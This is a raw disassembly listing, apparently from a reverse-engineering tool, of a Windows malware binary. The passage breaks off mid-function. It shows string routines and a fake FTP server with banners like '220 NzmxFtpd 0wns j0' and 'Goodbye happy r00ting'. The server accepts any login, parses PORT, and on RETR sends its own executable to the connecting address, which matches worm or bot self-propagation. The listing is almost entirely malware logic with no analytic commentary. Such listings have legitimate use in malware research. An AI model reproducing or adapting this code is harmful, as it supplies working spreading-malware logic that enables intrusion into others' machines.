arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_4036F9
call sub_420983
loc_4036F9: ; CODE XREF: sub_4036E1+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_40370B
mov esi, [ebp+arg_8]
loc_40370B: ; CODE XREF: sub_4036E1+25�j
cmp edi, ebx
jnz short loc_40372D
push ds:dword_422268
add esi, ecx
mov ecx, edi
push esi
call sub_4038A5
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_4038A5
jmp short loc_4037A6
; ---------------------------------------------------------------------------
loc_40372D: ; CODE XREF: sub_4036E1+2C�j
test esi, esi
jbe short loc_403770
cmp esi, eax
jnz short loc_403770
mov eax, [ebx+4]
test eax, eax
jnz short loc_403741
mov eax, offset dword_422278
loc_403741: ; CODE XREF: sub_4036E1+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_403770
push 1
mov ecx, edi
call sub_403834
mov eax, [ebx+4]
test eax, eax
jnz short loc_40375C
mov eax, offset dword_422278
loc_40375C: ; CODE XREF: sub_4036E1+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_4037A6
; ---------------------------------------------------------------------------
loc_403770: ; CODE XREF: sub_4036E1+4E�j
; sub_4036E1+52�j ...
push 1
push esi
mov ecx, edi
call sub_4037AF
test al, al
jz short loc_4037A6
mov eax, [ebx+4]
test eax, eax
jnz short loc_40378A
mov eax, offset dword_422278
loc_40378A: ; CODE XREF: sub_4036E1+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_415560
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_4037A6: ; CODE XREF: sub_4036E1+4A�j
; sub_4036E1+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_4036E1 endp
; =============== S U B R O U T I N E =======================================
sub_4037AF proc near ; CODE XREF: sub_4031FF+3D�p
; sub_403631+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_4037C1
call sub_420AAA
loc_4037C1: ; CODE XREF: sub_4037AF+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_4037EA
mov al, [ecx-1]
cmp al, dl
jz short loc_4037EA
cmp al, 0FFh
jz short loc_4037EA
cmp edi, edx
jnz short loc_403825
dec al
push edx
mov [ecx-1], al
loc_4037DF: ; CODE XREF: sub_4037AF+47�j
mov ecx, esi
call sub_403834
loc_4037E6: ; CODE XREF: sub_4037AF+4B�j
; sub_4037AF+52�j
xor al, al
jmp short loc_40382F
; ---------------------------------------------------------------------------
loc_4037EA: ; CODE XREF: sub_4037AF+19�j
; sub_4037AF+20�j ...
cmp edi, edx
jnz short loc_403803
cmp [esp+8+arg_4], dl
jz short loc_4037F8
push 1
jmp short loc_4037DF
; ---------------------------------------------------------------------------
loc_4037F8: ; CODE XREF: sub_4037AF+43�j
cmp ecx, edx
jz short loc_4037E6
mov [esi+8], edx
mov [ecx], dl
jmp short loc_4037E6
; ---------------------------------------------------------------------------
loc_403803: ; CODE XREF: sub_4037AF+3D�j
cmp [esp+8+arg_4], dl
jz short loc_403820
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_403815
cmp eax, edi
jnb short loc_40382D
loc_403815: ; CODE XREF: sub_4037AF+60�j
push 1
mov ecx, esi
call sub_403834
jmp short loc_403825
; ---------------------------------------------------------------------------
loc_403820: ; CODE XREF: sub_4037AF+58�j
cmp [esi+0Ch], edi
jnb short loc_40382D
loc_403825: ; CODE XREF: sub_4037AF+28�j
; sub_4037AF+6F�j
push edi
mov ecx, esi
call sub_40390C
loc_40382D: ; CODE XREF: sub_4037AF+64�j
; sub_4037AF+74�j
mov al, 1
loc_40382F: ; CODE XREF: sub_4037AF+39�j
pop edi
pop esi
retn 8
sub_4037AF endp
; =============== S U B R O U T I N E =======================================
sub_403834 proc near ; CODE XREF: sub_4031FF+1F�p
; sub_4031FF+16A�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_403860
mov eax, [esi+4]
test eax, eax
jz short loc_403860
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_403859
cmp al, 0FFh
jz short loc_403859
dec al
mov [ecx], al
jmp short loc_403860
; ---------------------------------------------------------------------------
loc_403859: ; CODE XREF: sub_403834+19�j
; sub_403834+1D�j
push ecx
call sub_416457
pop ecx
loc_403860: ; CODE XREF: sub_403834+8�j
; sub_403834+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_403834 endp
; =============== S U B R O U T I N E =======================================
sub_403870 proc near ; CODE XREF: sub_40345C+134�p
; sub_4039C9+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_4037AF
test al, al
jz short loc_40389E
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_415560
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_40389E: ; CODE XREF: sub_403870+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_403870 endp
; =============== S U B R O U T I N E =======================================
sub_4038A5 proc near ; CODE XREF: sub_4036E1+39�p
; sub_4036E1+45�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_4038B8
call sub_420983
loc_4038B8: ; CODE XREF: sub_4038A5+C�j
mov ecx, edi
call sub_4039C9
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_4038CE
mov ebx, eax
loc_4038CE: ; CODE XREF: sub_4038A5+25�j
test ebx, ebx
jbe short loc_403904
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_416470
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_4037AF
test al, al
jz short loc_403904
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_403904: ; CODE XREF: sub_4038A5+2B�j
; sub_4038A5+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_4038A5 endp
; =============== S U B R O U T I N E =======================================
sub_40390C proc near ; CODE XREF: sub_4037AF+79�p
mov eax, offset loc_42122C
call sub_416438
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_403932
mov edi, [ebp+8]
loc_403932: ; CODE XREF: sub_40390C+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_40393F
xor eax, eax
loc_40393F: ; CODE XREF: sub_40390C+2F�j
push eax
call sub_4167A5
pop ecx
mov [ebp+8], eax
jmp short loc_403970
; ---------------------------------------------------------------------------
loc_40394B: ; DATA XREF: _1:00422F84�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_40395A
xor eax, eax
loc_40395A: ; CODE XREF: sub_40390C+4A�j
push eax
call sub_4167A5
mov [ebp+8], eax
pop ecx
mov eax, offset loc_40396A
retn
; ---------------------------------------------------------------------------
loc_40396A: ; DATA XREF: sub_40390C+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_403970: ; CODE XREF: sub_40390C+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40398E
cmp eax, edi
jbe short loc_40397D
mov eax, edi
loc_40397D: ; CODE XREF: sub_40390C+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_415560
add esp, 0Ch
loc_40398E: ; CODE XREF: sub_40390C+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_403834
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_4039AE
mov edi, ebx
loc_4039AE: ; CODE XREF: sub_40390C+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40390C endp
; =============== S U B R O U T I N E =======================================
sub_4039C9 proc near ; CODE XREF: sub_4038A5+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_4039F6
mov al, [esi-1]
test al, al
jz short loc_4039F6
cmp al, 0FFh
jz short loc_4039F6
push 1
call sub_403834
push esi
call sub_415C80
pop ecx
push eax
push esi
mov ecx, edi
call sub_403870
loc_4039F6: ; CODE XREF: sub_4039C9+9�j
; sub_4039C9+10�j ...
pop edi
pop esi
retn
sub_4039C9 endp
; =============== S U B R O U T I N E =======================================
sub_4039F9 proc near ; DATA XREF: _2:00424004�o
test ds:byte_4C937C, 1
jnz short loc_403A09
or ds:byte_4C937C, 1
loc_403A09: ; CODE XREF: sub_4039F9+7�j
jmp $+5
push offset nullsub_2
call sub_416820
pop ecx
retn
sub_4039F9 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A1B proc near ; DATA XREF: sub_405898+226�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
call ds:dword_4221D8 ; WSAStartup
push edi
call sub_416ACB
push eax
call sub_4154D2
push 0FEB0h
push 406h
call sub_4138BE
add esp, 10h
mov ds:dword_4325E0, eax
push edi
push ebx
push 2
call ds:dword_422200 ; socket
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call ds:dword_4221DC ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
call ds:dword_422204 ; ioctlsocket
mov ax, word ptr ds:dword_4325E0
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call ds:dword_4221E0 ; htons
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call ds:dword_4221E4 ; bind
test eax, eax
jge short loc_403AF0
mov eax, ebx
jmp loc_40401A
; ---------------------------------------------------------------------------
loc_403AF0: ; CODE XREF: sub_403A1B+CC�j
push 0Ah
push esi
call ds:dword_4221E8 ; listen
mov [ebp+var_228], ebx
mov ebx, ds:dword_4221F4
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_403B0E: ; CODE XREF: sub_403A1B+12C�j
; sub_403A1B+5F7�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor esi, esi
lea eax, [ebp+var_438]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_4221F8 ; select
cmp eax, 0FFFFFFFFh
jz loc_404017
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_403B0E
loc_403B49: ; CODE XREF: sub_403A1B+5F1�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_415500
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_415500
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_420B60 ; __WSAFDIsSet
test eax, eax
jz loc_404005
cmp edi, [ebp+var_C]
jnz short loc_403C00
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_C]
call ds:dword_4221EC ; accept
cmp eax, 0FFFFFFFFh
jz loc_404005
xor ecx, ecx
cmp [ebp+var_228], esi
jbe short loc_403BCA
lea edx, [ebp+var_224]
loc_403BBA: ; CODE XREF: sub_403A1B+1AD�j
cmp [edx], eax
jz short loc_403BCA
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
jb short loc_403BBA
loc_403BCA: ; CODE XREF: sub_403A1B+197�j
; sub_403A1B+1A1�j
cmp ecx, [ebp+var_228]
jnz short loc_403BE8
cmp [ebp+var_228], 40h
jnb short loc_403BE8
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_403BE8: ; CODE XREF: sub_403A1B+1B5�j
; sub_403A1B+1BE�j
cmp eax, [ebp+var_4]
jle short loc_403BF0
mov [ebp+var_4], eax
loc_403BF0: ; CODE XREF: sub_403A1B+1D0�j
push esi
push 15h
push offset a220Nzmxftpd0wn ; "220 NzmxFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_404005
; ---------------------------------------------------------------------------
loc_403C00: ; CODE XREF: sub_403A1B+169�j
push esi
lea eax, [ebp+var_29C]
push 64h
push eax
push edi
call ds:dword_4221F0 ; recv
test eax, eax
jg short loc_403C67
mov edx, [ebp+var_228]
xor ecx, ecx
cmp edx, esi
jbe short loc_403C5B
lea eax, [ebp+var_224]
loc_403C27: ; CODE XREF: sub_403A1B+216�j
cmp [eax], edi
jz short loc_403C35
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_403C27
jmp short loc_403C5B
; ---------------------------------------------------------------------------
loc_403C35: ; CODE XREF: sub_403A1B+20E�j
dec edx
cmp ecx, edx
jnb short loc_403C55
lea eax, [ebp+ecx*4+var_224]
loc_403C41: ; CODE XREF: sub_403A1B+238�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_403C41
loc_403C55: ; CODE XREF: sub_403A1B+21D�j
dec [ebp+var_228]
loc_403C5B: ; CODE XREF: sub_403A1B+204�j
; sub_403A1B+218�j
push edi
call ds:dword_42220C ; closesocket
jmp loc_404005
; ---------------------------------------------------------------------------
loc_403C67: ; CODE XREF: sub_403A1B+1F8�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset aSS ; "%s %s"
push eax
call sub_416A97
lea eax, [ebp+var_AC]
push offset aUser_0 ; "USER"
push eax
call sub_4158A0
add esp, 18h
test eax, eax
jnz short loc_403CAB
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403CAB: ; CODE XREF: sub_403A1B+281�j
lea eax, [ebp+var_AC]
push offset aPass ; "PASS"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403CCF
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403CCF: ; CODE XREF: sub_403A1B+2A5�j
lea eax, [ebp+var_AC]
push offset aSyst ; "SYST"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403CF3
push esi
push 0Dh
push offset a215Nzmxftpd ; "215 NzmxFtpd\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403CF3: ; CODE XREF: sub_403A1B+2C9�j
lea eax, [ebp+var_AC]
push offset aRest ; "REST"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403D17
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403D17: ; CODE XREF: sub_403A1B+2ED�j
lea eax, [ebp+var_AC]
push offset off_425C40
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403D3B
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403D3B: ; CODE XREF: sub_403A1B+311�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403D76
lea eax, [ebp+var_334]
push offset aA ; "A"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403D76
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403D76: ; CODE XREF: sub_403A1B+335�j
; sub_403A1B+34C�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403DB1
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403DB1
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_403FF0
; ---------------------------------------------------------------------------
loc_403DB1: ; CODE XREF: sub_403A1B+370�j
; sub_403A1B+387�j
lea eax, [ebp+var_AC]
push offset aPasv ; "PASV"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403DFF
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_124]
loc_403DEF: ; CODE XREF: sub_403A1B+423�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_403DF7: ; CODE XREF: sub_403A1B+4F6�j
mov edi, [ebp+arg_0]
jmp loc_403FF3
; ---------------------------------------------------------------------------
loc_403DFF: ; CODE XREF: sub_403A1B+3AB�j
lea eax, [ebp+var_AC]
push offset aList ; "LIST"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403E40
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_403DEF
; ---------------------------------------------------------------------------
loc_403E40: ; CODE XREF: sub_403A1B+3F9�j
lea eax, [ebp+var_AC]
push offset aPort ; "PORT"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_403F16
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_416A97
lea eax, [ebp+var_F8]
push eax
call sub_4159EF
mov edi, eax
lea eax, [ebp+var_2D0]
push eax
call sub_4159EF
mov [ebp+var_8], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_415500
add esp, 34h
lea eax, [ebp+var_F8]
push [ebp+var_8]
push edi
push offset aXX ; "%x%x\n"
push eax
call sub_415480
push 10h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_416A80
add esp, 1Ch
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_415480
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_403DF7
; ---------------------------------------------------------------------------
loc_403F16: ; CODE XREF: sub_403A1B+43A�j
lea eax, [ebp+var_AC]
push offset aRetr ; "RETR"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_403FD1
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_404021
pop ecx
cmp eax, 1
pop ecx
jnz short loc_403FC7
call sub_40409E
cmp eax, 1
jnz loc_403FF3
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push ds:dword_4325E0
push eax
lea eax, [ebp+var_8DC]
push offset unk_425A94
push eax
call sub_415480
add esp, 14h
cmp [ebp+var_440], esi
jnz short loc_403FB8
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_40BAE7
add esp, 14h
loc_403FB8: ; CODE XREF: sub_403A1B+578�j
lea eax, [ebp+var_8DC]
push eax
call sub_40A5B3
pop ecx
jmp short loc_403FF3
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403A1B+532�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_403FF0
; ---------------------------------------------------------------------------
loc_403FD1: ; CODE XREF: sub_403A1B+510�j
lea eax, [ebp+var_AC]
push offset aQuit ; "QUIT"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_403FF3
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_403FF0: ; CODE XREF: sub_403A1B+28B�j
; sub_403A1B+2AF�j ...
push edi
call ebx ; send
loc_403FF3: ; CODE XREF: sub_403A1B+3DF�j
; sub_403A1B+53C�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_415500
add esp, 0Ch
loc_404005: ; CODE XREF: sub_403A1B+160�j
; sub_403A1B+189�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_403B49
jmp loc_403B0E
; ---------------------------------------------------------------------------
loc_404017: ; CODE XREF: sub_403A1B+11E�j
push 1
pop eax
loc_40401A: ; CODE XREF: sub_403A1B+D0�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_403A1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404021 proc near ; CODE XREF: sub_403A1B+528�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4221D8 ; WSAStartup
push 0
push 1
push 2
call ds:dword_422200 ; socket
push [ebp+arg_0]
mov ds:dword_4325DC, eax
mov [ebp+var_10], 2
call ds:dword_4221D0 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4221E0 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_4325DC
call ds:dword_422208 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_404099
push ds:dword_4325DC
call ds:dword_42220C ; closesocket
call ds:dword_4221D4 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_404099: ; CODE XREF: sub_404021+60�j
push 1
pop eax
leave
retn
sub_404021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40409E proc near ; CODE XREF: sub_403A1B+534�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:off_422060
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_415B78
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_404135
test byte ptr [esi+0Ch], 10h
jnz short loc_404119
push edi
mov edi, 400h
loc_4040E1: ; CODE XREF: sub_40409E+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_416BA7
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push ds:dword_4325DC
call ds:dword_4221F4 ; send
push 1
call ds:dword_422054 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_4040E1
pop edi
loc_404119: ; CODE XREF: sub_40409E+3B�j
push esi
call sub_415AD0
pop ecx
push ds:dword_4325DC
call ds:dword_42220C ; closesocket
call ds:dword_4221D4 ; WSACleanup
push 1
pop eax
loc_404135: ; CODE XREF: sub_40409E+35�j
pop esi
leave
retn
sub_40409E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404138 proc near ; DATA XREF: sub_405898+333�o
; sub_40D2E0+54E8�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_415D00
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_415500
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call ds:dword_436468 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call ds:dword_4364E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_404523
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov ds:dword_43BECC[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_436494 ; bind
cmp eax, 0FFFFFFFFh
jz loc_404523
push 7FFFFFFFh
push edi
call ds:dword_436490 ; listen
cmp eax, 0FFFFFFFFh
jz loc_404523
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call ds:dword_436504 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_404523
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40420F: ; CODE XREF: sub_404138+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call ds:dword_436450 ; select
cmp eax, 0FFFFFFFFh
jz loc_40451E
xor esi, esi
mov [ebp+var_4], esi
loc_404245: ; CODE XREF: sub_404138+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call ds:dword_436360 ; __WSAFDIsSet
test eax, eax
jz loc_404509
cmp esi, [ebp+var_C]
jnz short loc_4042C7
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call ds:dword_4364FC ; accept
cmp eax, 0FFFFFFFFh
jz loc_404509
xor ecx, ecx
test ebx, ebx
jbe short loc_404299
lea edx, [ebp+var_134]
loc_40428D: ; CODE XREF: sub_404138+15F�j
cmp [edx], eax
jz short loc_404299
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_40428D
loc_404299: ; CODE XREF: sub_404138+14D�j
; sub_404138+157�j
cmp ecx, ebx
jnz short loc_4042B6
cmp ebx, 40h
jnb short loc_4042B6
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_4042B6: ; CODE XREF: sub_404138+163�j
; sub_404138+168�j
